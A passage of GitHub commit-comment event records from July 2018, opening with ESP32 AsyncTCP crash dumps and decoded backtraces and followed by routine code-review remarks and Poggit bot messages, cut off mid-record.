C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n-----------------------------\r\n\r\ndump:\r\nGuru Meditation Error: Core  1 panic'ed (IllegalInstruction)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x6320656d  PS      : 0x00060b30  A0      : 0x800d5d05  A1      : 0x3ffdca60  \r\nA2      : 0x3ffddef0  A3      : 0x74207373  A4      : 0x3ffdded8  A5      : 0x3ffdcb10  \r\nA6      : 0x3ffe3dbc  A7      : 0x00000000  A8      : 0x800d5c91  A9      : 0x3ffdca50  \r\nA10     : 0x3ffddef0  A11     : 0x3ffdca6c  A12     : 0x3ffdca68  A13     : 0x3ffe3a0c  \r\nA14     : 0x00000004  A15     : 0x00000001  SAR     : 0x0000000a  EXCCAUSE: 0x00000000  \r\nEXCVADDR: 0x00000000  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x6320656d:0x3ffdca60 0x400d5d02:0x3ffdca90 0x400d5fa9:0x3ffdcad0 0x400d601b:0x3ffdcb00\r\n\r\n\r\ndecode:\r\nPC: 0x6320656d\r\nEXCVADDR: 0x00000000\r\n\r\nDecoding stack results\r\n0x400d5d02: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 472\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n------------------------------------\r\ndump:\r\n\r\nGuru Meditation Error: Core  1 panic'ed (IllegalInstruction)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x6320656d  PS      : 0x00060530  A0      : 0x800d5d05  A1      : 0x3ffdca80  \r\nA2      : 0x3ffde424  A3      : 0x74207373  A4      : 0x3ffde40c  A5      : 0x3ffdcb30  \r\nA6      : 0x3ffe2220  A7      : 0x00000000  A8      : 0x800d5c91  A9      : 0x3ffdca60  \r\nA10     : 0x3ffde424  A11     : 0x3ffdca8c  A12     : 0x3ffdca88  A13     : 0x3ffdf8a0  \r\nA14     : 0x00000002  A15     : 0x00000001  SAR     : 0x0000000a  EXCCAUSE: 0x00000000  \r\nEXCVADDR: 0x00000000  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x6320656d:0x3ffdca80 0x400d5d02:0x3ffdcab0 0x400d5fa9:0x3ffdcaf0 0x400d601b:0x3ffdcb20\r\n\r\nPaste your stack trace here\r\n\r\ndecode:\r\nPC: 0x6320656d\r\nEXCVADDR: 0x00000000\r\n\r\nDecoding stack results\r\n0x400d5d02: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 472\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n\r\n-------------------------------\r\n\r\ndump:\r\nassertion \"heap != NULL && \"free() target pointer is outside heap areas\"\" failed: file \"/Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c\", line 261, function: heap_caps_free\r\nabort() was called at PC 0x400db793 on core 1\r\n\r\nBacktrace: 0x4008d950:0x3ffdd0b0 0x4008db2b:0x3ffdd0d0 0x400db793:0x3ffdd0f0 0x40083eef:0x3ffdd120 0x40085da1:0x3ffdd140 0x4000bec7:0x3ffdd160 0x400f1881:0x3ffdd180 0x400f1943:0x3ffdd1a0 0x400d5cca:0x3ffdd1c0 0x400d5fa9:0x3ffdd200 0x400d601b:0x3ffdd230\r\n\r\n\r\ndecode:\r\nDecoding stack results\r\n0x4008d950: invoke_abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 139\r\n0x4008db2b: abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 148\r\n0x400db793: __assert_func at ../../../.././newlib/libc/stdlib/assert.c line 63\r\n0x40083eef: heap_caps_free at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c line 261\r\n0x40085da1: _free_r at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/newlib/./syscalls.c line 42\r\n0x400f1881: tcp_close_shutdown at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 225\r\n0x400f1943: tcp_close at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 305\r\n0x400d5cca: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 463\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n--------------------------------------\r\ndump:\r\nassertion \"heap != NULL && \"free() target pointer is outside heap areas\"\" failed: file \"/Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c\", line 261, function: heap_caps_free\r\nabort() was called at PC 0x400db793 on core 1\r\n\r\nBacktrace: 0x4008d950:0x3ffdd0b0 0x4008db2b:0x3ffdd0d0 0x400db793:0x3ffdd0f0 0x40083eef:0x3ffdd120 0x40085da1:0x3ffdd140 0x4000bec7:0x3ffdd160 0x400f1881:0x3ffdd180 0x400f1943:0x3ffdd1a0 0x400d5cca:0x3ffdd1c0 0x400d5fa9:0x3ffdd200 0x400d601b:0x3ffdd230\r\n\r\n\r\ndecode:\r\nDecoding stack results\r\n0x4008d950: invoke_abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 139\r\n0x4008db2b: abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 148\r\n0x400db793: __assert_func at ../../../.././newlib/libc/stdlib/assert.c line 63\r\n0x40083eef: heap_caps_free at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c line 261\r\n0x40085da1: _free_r at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/newlib/./syscalls.c line 42\r\n0x400f1881: tcp_close_shutdown at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 225\r\n0x400f1943: tcp_close at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 305\r\n0x400d5cca: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 463\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n--------------------------\r\ndump:\r\nGuru Meditation Error: Core  1 panic'ed (InstrFetchProhibited)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x00000000  PS      : 0x00060f30  A0      : 0x800d601e  A1      : 0x3ffdcad0  \r\nA2      : 0x3ffde9b8  A3      : 0x00000000  A4      : 0x3ffdab04  A5      : 0x00000000  \r\nA6      : 0x3ffdab44  A7      : 0x00000000  A8      : 0x800d5f88  A9      : 0x00000018  \r\nA10     : 0x3ffdea34  A11     : 0x3ffdcad4  A12     : 0x3ffdcad8  A13     : 0x3ffdcadc  \r\nA14     : 0x3ffdcadc  A15     : 0x3ffdaba0  SAR     : 0x0000000a  EXCCAUSE: 0x00000014  \r\nEXCVADDR: 0x00000000  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x00000000:0x3ffdcad0 0x400d601b:0x3ffdcb00\r\n\r\ndecode:\r\nPC: 0x00000000\r\nEXCVADDR: 0x00000000\r\n\r\nDecoding stack results\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n\r\n-------------------------------\r\n\r\ndump:\r\nassertion \"heap != NULL && \"free() target pointer is outside heap areas\"\" failed: file \"/Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c\", line 261, function: heap_caps_free\r\nabort() was called at PC 0x400db793 on core 1\r\n\r\nBacktrace: 0x4008d950:0x3ffdd0b0 0x4008db2b:0x3ffdd0d0 0x400db793:0x3ffdd0f0 0x40083eef:0x3ffdd120 0x40085da1:0x3ffdd140 0x4000bec7:0x3ffdd160 0x400f1881:0x3ffdd180 0x400f1943:0x3ffdd1a0 0x400d5cca:0x3ffdd1c0 0x400d5fa9:0x3ffdd200 0x400d601b:0x3ffdd230\r\n\r\n\r\ndecode:\r\nDecoding stack results\r\n0x4008d950: invoke_abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 139\r\n0x4008db2b: abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 148\r\n0x400db793: __assert_func at ../../../.././newlib/libc/stdlib/assert.c line 63\r\n0x40083eef: heap_caps_free at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c line 261\r\n0x40085da1: _free_r at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/newlib/./syscalls.c line 42\r\n0x400f1881: tcp_close_shutdown at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 225\r\n0x400f1943: tcp_close at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 305\r\n0x400d5cca: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 463\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n\r\nregards,\r\n\r\nArjan\r\n\r\n"}},"created_at":"2018-07-28T16:33:19Z"}
{"id":"8032536098","type":"CommitCommentEvent","actor":{"login":"zgldh"},"repo":{"name":"spatie/laravel-activitylog"},"payload":{"comment":{"id":29869370,"position":16,"line":15,"path":"src/helpers.php","commit_id":"d8b9d060383cbd2abb961b5c1d187edb6183ec14","created_at":"2018-07-28T16:33:40Z","updated_at":"2018-07-28T16:33:40Z","author_association":"NONE","body":"I think the app() container will resolve the ActivityLogStatus parameter properly. You don't need to call setLogStatus() manually."}},"created_at":"2018-07-28T16:33:40Z"}
{"id":"8032536631","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"Minetron-26/Fly26"},"payload":{"comment":{"id":29869374,"position":null,"line":null,"path":null,"commit_id":"bbf432e7538a0af37cde2ab5a724d0e741f8e266","created_at":"2018-07-28T16:34:06Z","updated_at":"2018-07-28T16:34:06Z","author_association":"NONE","body":"Dear @Minetron-26:\nI regret to inform you that the release you submitted, named \"**Fly26**\" (v0.0.1), for the project [Fly26](https://poggit.pmmp.io/ci/Minetron-26/Fly26/Fly26) on 2018-07-25T00:52:30.000Z, has been rejected.\n\nPlugin must be in English or at least have one translation (and default) in English.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-28T16:34:06Z"}
{"id":"8032539708","type":"CommitCommentEvent","actor":{"login":"konphorm"},"repo":{"name":"socketbind/tftp4j"},"payload":{"comment":{"id":29869382,"position":null,"line":null,"path":null,"commit_id":"07f81e965db0d3d54e9866b816e25c1ee1cfc416","created_at":"2018-07-28T16:36:16Z","updated_at":"2018-07-28T16:36:16Z","author_association":"NONE","body":"No worries, I was curious as I was only seeing issues from the partial RFC2348 support.\r\n\r\nI've had luck both forcing the blocksize to 512 in all cases (no OACK, ignore option blksize), and with your OACK patch. I suspect the blksize negotiation was your only real issue, but I can see how the window would be suspect. The behavior I was seeing was odd, in that some file sizes would download just fine, it seemed to depend on $fileSize % $blkSize. For example I had a ~900 byte file that would fail, and ~25MB file that was fine before any of these patches.\r\n\r\nUse cases that involve higher latency environments really benefit from the sliding window , but obliviously correctness comes first, so I was curious. I like the idea of simply making it a configuration option.\r\n\r\nThanks for OACK patch, and taking the time to answer these questions. You've been very helpful, much appreciated."}},"created_at":"2018-07-28T16:36:16Z"}
{"id":"8032540094","type":"CommitCommentEvent","actor":{"login":"Vihru"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29869383,"position":null,"line":null,"path":null,"commit_id":"9f15de3da5deb26ef4d50e429238a72a2a9f0332","created_at":"2018-07-28T16:36:32Z","updated_at":"2018-07-28T16:36:32Z","author_association":"NONE","body":"@dogiex, tietoturva-sovelluksessa ainakin vielä englantia.. tarviiko tehdä issue vai onko ne tulossa pian?"}},"created_at":"2018-07-28T16:36:32Z"}
{"id":"8032540277","type":"CommitCommentEvent","actor":{"login":"g17749968007"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29869384,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-28T16:36:39Z","updated_at":"2018-07-28T16:36:39Z","author_association":"NONE","body":"121212121"}},"created_at":"2018-07-28T16:36:39Z"}
{"id":"8032542637","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29869391,"position":10,"line":989,"path":"github-dark.css","commit_id":"789fe73b9aef1976c883f562dfef44bf417a96c1","created_at":"2018-07-28T16:38:07Z","updated_at":"2018-07-28T16:38:07Z","author_association":"MEMBER","body":"Fixed that."}},"created_at":"2018-07-28T16:38:07Z"}
{"id":"8032544247","type":"CommitCommentEvent","actor":{"login":"Thunder33345"},"repo":{"name":"SuperKali/HealthUI"},"payload":{"comment":{"id":29869395,"position":null,"line":null,"path":null,"commit_id":"fc95673090c3302903b8b36085ba5457b8b06fb6","created_at":"2018-07-28T16:39:15Z","updated_at":"2018-07-28T16:39:15Z","author_association":"NONE","body":"Dear @SuperKali:\nI regret to inform you that the release you submitted, named \"**HealthUI**\" (v0.0.3), for the project [HealthUI](https://poggit.pmmp.io/ci/SuperKali/HealthUI/HealthUI) on 2018-07-28T08:34:20.000Z, has been rejected.\n\nnecessary api versioning\nyou only need to support one of the lowest supported version\nhttps://github.com/SuperKali/HealthUI/blob/fc95673090c3302903b8b36085ba5457b8b06fb6/plugin.yml#L3\n\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-28T16:39:15Z"}
{"id":"8032544571","type":"CommitCommentEvent","actor":{"login":"mg123x09"},"repo":{"name":"mg123x09/proyecto"},"payload":{"comment":{"id":29869396,"position":null,"line":null,"path":null,"commit_id":"31284389ed1e8f98838db5c996e8c0bd7a34a6c7","created_at":"2018-07-28T16:39:30Z","updated_at":"2018-07-28T16:39:30Z","author_association":"OWNER","body":"Good"}},"created_at":"2018-07-28T16:39:30Z"}
{"id":"8032545140","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29869403,"position":null,"line":null,"path":null,"commit_id":"a64ff3b1a21faee7d5e96f2257caaffc7fb4c9ae","created_at":"2018-07-28T16:39:57Z","updated_at":"2018-07-28T16:39:57Z","author_association":"MEMBER","body":"Didn't really work out. Last issue I had was that a style for help.github.com was overriding one of github.com. Might have worked with separate document sections, but that seemed too complicated to realize so we have significant order back again."}},"created_at":"2018-07-28T16:39:57Z"}
{"id":"8032545215","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/MatomoAnalytics"},"payload":{"comment":{"id":29869406,"position":null,"line":null,"path":null,"commit_id":"176ce32f263f028192f95ac5941ea4a51f272e76","created_at":"2018-07-28T16:40:00Z","updated_at":"2018-07-28T16:40:00Z","author_association":"MEMBER","body":"What if someone has a similar use case to us and doesn’t want to use database?"}},"created_at":"2018-07-28T16:40:00Z"}
{"id":"8032545857","type":"CommitCommentEvent","actor":{"login":"TishkaCup"},"repo":{"name":"TishkaCup/Purnov"},"payload":{"comment":{"id":29869407,"position":null,"line":null,"path":null,"commit_id":"ccda09c460ea10dbba7bc3b7af0ec1067e4b5d63","created_at":"2018-07-28T16:40:26Z","updated_at":"2018-07-28T16:40:26Z","author_association":"OWNER","body":"https://blog.purnov.com/vsa-signal-sot-prodazha-popytki/"}},"created_at":"2018-07-28T16:40:26Z"}
{"id":"8032546197","type":"CommitCommentEvent","actor":{"login":"metamasterplay"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869409,"position":9,"line":11,"path":"MoleQla/Models/seccion.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T16:40:42Z","updated_at":"2018-07-28T16:40:42Z","author_association":"NONE","body":"Better change to name so that the display name will be supported natively"}},"created_at":"2018-07-28T16:40:42Z"}
{"id":"8032547417","type":"CommitCommentEvent","actor":{"login":"metamasterplay"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869414,"position":18,"line":77,"path":"MoleQla/Models/articulo.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T16:41:34Z","updated_at":"2018-07-28T16:41:34Z","author_association":"NONE","body":"Once you have proper access rights, you can remove sudo()"}},"created_at":"2018-07-28T16:41:34Z"}
{"id":"8032549394","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29869419,"position":null,"line":null,"path":null,"commit_id":"465a7c1fbeef8716b02f5affec18e2f012911b4e","created_at":"2018-07-28T16:43:00Z","updated_at":"2018-07-28T16:43:00Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T16:43:00Z"}
{"id":"8032549773","type":"CommitCommentEvent","actor":{"login":"ThomasWaldmann"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29869420,"position":52,"line":1571,"path":"Lib/logging/__init__.py","commit_id":"78c18a9b9a1445f7c755929917a790ba02b4a5e0","created_at":"2018-07-28T16:43:14Z","updated_at":"2018-07-28T16:43:14Z","author_association":"NONE","body":"I logged the result of `logger.isEnabledFor(logging.INFO)` just below the failing log call and it's True on py36 and false on unmodified py37."}},"created_at":"2018-07-28T16:43:14Z"}
{"id":"8032550788","type":"CommitCommentEvent","actor":{"login":"fmaraque"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869425,"position":9,"line":11,"path":"MoleQla/Models/seccion.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T16:44:03Z","updated_at":"2018-07-28T16:44:03Z","author_association":"OWNER","body":"You mean name = fields.Char('Nombre', size=128, required=True) ?? For that I will need to delete the display_name() and update the view.xml, isn't it?"}},"created_at":"2018-07-28T16:44:03Z"}
{"id":"8032551278","type":"CommitCommentEvent","actor":{"login":"horlahlekhon"},"repo":{"name":"horlahlekhon/Athena"},"payload":{"comment":{"id":29869427,"position":null,"line":null,"path":null,"commit_id":"b00c66c2e21bcac8b9eff232ee4f2f7913a8ad90","created_at":"2018-07-28T16:44:25Z","updated_at":"2018-07-28T16:44:25Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-28T16:44:25Z"}
{"id":"8032551731","type":"CommitCommentEvent","actor":{"login":"fmaraque"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869430,"position":18,"line":77,"path":"MoleQla/Models/articulo.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T16:44:45Z","updated_at":"2018-07-28T16:44:45Z","author_association":"OWNER","body":"ok, will delete sudo()"}},"created_at":"2018-07-28T16:44:45Z"}
{"id":"8032552219","type":"CommitCommentEvent","actor":{"login":"metamasterplay"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869433,"position":9,"line":11,"path":"MoleQla/Models/seccion.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T16:45:06Z","updated_at":"2018-07-28T16:45:06Z","author_association":"NONE","body":"Yes. As a workaround you can keep display_name if there are too many changes"}},"created_at":"2018-07-28T16:45:06Z"}
{"id":"8032552931","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869436,"position":14,"line":9,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:45:27Z","updated_at":"2018-07-28T16:45:27Z","author_association":"NONE","body":"Ну сейчас у нас получается ни туда и ни сюда. Возвращается строка из метода. Лучше уже использовать puts и вывести сообющение."}},"created_at":"2018-07-28T16:45:27Z"}
{"id":"8032553203","type":"CommitCommentEvent","actor":{"login":"crackloi"},"repo":{"name":"epoberezkin/ajv"},"payload":{"comment":{"id":29869437,"position":null,"line":null,"path":null,"commit_id":"d9c02e0146529aa24ad6243e6c39ce80b4a5c68f","created_at":"2018-07-28T16:45:35Z","updated_at":"2018-07-28T16:45:35Z","author_association":"NONE","body":"K"}},"created_at":"2018-07-28T16:45:35Z"}
{"id":"8032553475","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"miraheze/MatomoAnalytics"},"payload":{"comment":{"id":29869438,"position":null,"line":null,"path":null,"commit_id":"176ce32f263f028192f95ac5941ea4a51f272e76","created_at":"2018-07-28T16:45:49Z","updated_at":"2018-07-28T16:45:49Z","author_association":"MEMBER","body":"That isn't the db, that's a config :).\r\n\r\nIe it only sets numbers not the db."}},"created_at":"2018-07-28T16:45:49Z"}
{"id":"8032553579","type":"CommitCommentEvent","actor":{"login":"fmaraque"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869442,"position":18,"line":77,"path":"MoleQla/Models/articulo.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T16:45:55Z","updated_at":"2018-07-28T16:45:55Z","author_association":"OWNER","body":"What about the create() function?? should I delete all the if and else code?"}},"created_at":"2018-07-28T16:45:55Z"}
{"id":"8032553583","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869443,"position":14,"line":9,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:45:55Z","updated_at":"2018-07-28T16:45:55Z","author_association":"NONE","body":"Вместо passenger в строке вывести тип пришедший из аргумента в интерполяции"}},"created_at":"2018-07-28T16:45:55Z"}
{"id":"8032554105","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29869450,"position":null,"line":null,"path":null,"commit_id":"8ffe74df524785bfa45fbda95ee5af43e0c98c22","created_at":"2018-07-28T16:46:18Z","updated_at":"2018-07-28T16:46:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Build out Backend SQL](https://trello.com/c/XPsD1M9M/9-build-out-backend-sql)"}},"created_at":"2018-07-28T16:46:18Z"}
{"id":"8032554998","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/MatomoAnalytics"},"payload":{"comment":{"id":29869452,"position":null,"line":null,"path":null,"commit_id":"176ce32f263f028192f95ac5941ea4a51f272e76","created_at":"2018-07-28T16:46:57Z","updated_at":"2018-07-28T16:46:57Z","author_association":"MEMBER","body":"Yes, but if they don’t want to use the DB they use the config you’ve used to set the site ID.\r\n\r\nIf they want a global site too, they can’t in this commit."}},"created_at":"2018-07-28T16:46:57Z"}
{"id":"8032555551","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869458,"position":14,"line":9,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:47:20Z","updated_at":"2018-07-28T16:47:20Z","author_association":"NONE","body":"Подсчет поездов сделан верно, только лучше вытащить его из интерполяции на строку выше и записать в переменную. И эту переменную уже использовать в выводимой строке"}},"created_at":"2018-07-28T16:47:20Z"}
{"id":"8032555955","type":"CommitCommentEvent","actor":{"login":"dbansal18"},"repo":{"name":"dbansal18/stuff_abi"},"payload":{"comment":{"id":29869460,"position":null,"line":null,"path":null,"commit_id":"782718c0b3b35ca724d90c7d5894864e73672a38","created_at":"2018-07-28T16:47:37Z","updated_at":"2018-07-28T16:47:37Z","author_association":"OWNER","body":"new features"}},"created_at":"2018-07-28T16:47:37Z"}
{"id":"8032556716","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869461,"position":14,"line":9,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:48:13Z","updated_at":"2018-07-28T16:48:13Z","author_association":"NONE","body":"И можно не использовать `@` в `@trains` - потому-что содержимое переменной не меняется, то есть мы все равно обратимся к геттеру."}},"created_at":"2018-07-28T16:48:13Z"}
{"id":"8032556747","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869462,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T16:48:13Z","updated_at":"2018-07-28T16:48:13Z","author_association":"CONTRIBUTOR","body":"@XhmikosR sorry I was out the whole day so I couldn't do anything besides simply replying to your earlier messages.\r\n\r\nI had a look at the blog post you sent me earlier, but I couldn't make out the heads and tails of this beta feature - any more concrete step-by-step pointers? In particular I don't seem to find any mention on which side channel(s) `npm` would deliver that extra authentication code."}},"created_at":"2018-07-28T16:48:13Z"}
{"id":"8032559084","type":"CommitCommentEvent","actor":{"login":"Dyneteve"},"repo":{"name":"shekhawat2/android_kernel_xiaomi_whyred"},"payload":{"comment":{"id":29869466,"position":176,"line":455,"path":"drivers/video/fbdev/core/cfbimgblt.c","commit_id":"f69fd2e75183de09db4a064314f5434382e708d3","created_at":"2018-07-28T16:50:04Z","updated_at":"2018-07-28T16:50:04Z","author_association":"NONE","body":"PLZ"}},"created_at":"2018-07-28T16:50:04Z"}
{"id":"8032559245","type":"CommitCommentEvent","actor":{"login":"Dyneteve"},"repo":{"name":"shekhawat2/android_kernel_xiaomi_whyred"},"payload":{"comment":{"id":29869467,"position":176,"line":455,"path":"drivers/video/fbdev/core/cfbimgblt.c","commit_id":"f69fd2e75183de09db4a064314f5434382e708d3","created_at":"2018-07-28T16:50:12Z","updated_at":"2018-07-28T16:50:12Z","author_association":"NONE","body":"del WHITE SPACE PLZ VOLIT WHEN?"}},"created_at":"2018-07-28T16:50:12Z"}
{"id":"8032560147","type":"CommitCommentEvent","actor":{"login":"crownedgrouse"},"repo":{"name":"zotonic/jsxrecord"},"payload":{"comment":{"id":29869468,"position":null,"line":null,"path":null,"commit_id":"de1a6a4e09c1933369b34fc932c2f363c4789031","created_at":"2018-07-28T16:50:53Z","updated_at":"2018-07-28T16:50:53Z","author_association":"NONE","body":"Hi Marc,  jason is now able to return keys, values or both as binary,  for maps, proplist. \r\nFor records, values can be binary.\r\nUse option  `{binary, [k | v | kv]}` allow this. \r\nYour feedback welcome ! :) "}},"created_at":"2018-07-28T16:50:53Z"}
{"id":"8032560258","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Distoxicqted/Envoys"},"payload":{"comment":{"id":29869470,"position":null,"line":null,"path":null,"commit_id":"2b3571a1c0d499c30168f47a184dbc5364d6cddb","created_at":"2018-07-28T16:50:57Z","updated_at":"2018-07-28T16:50:57Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no 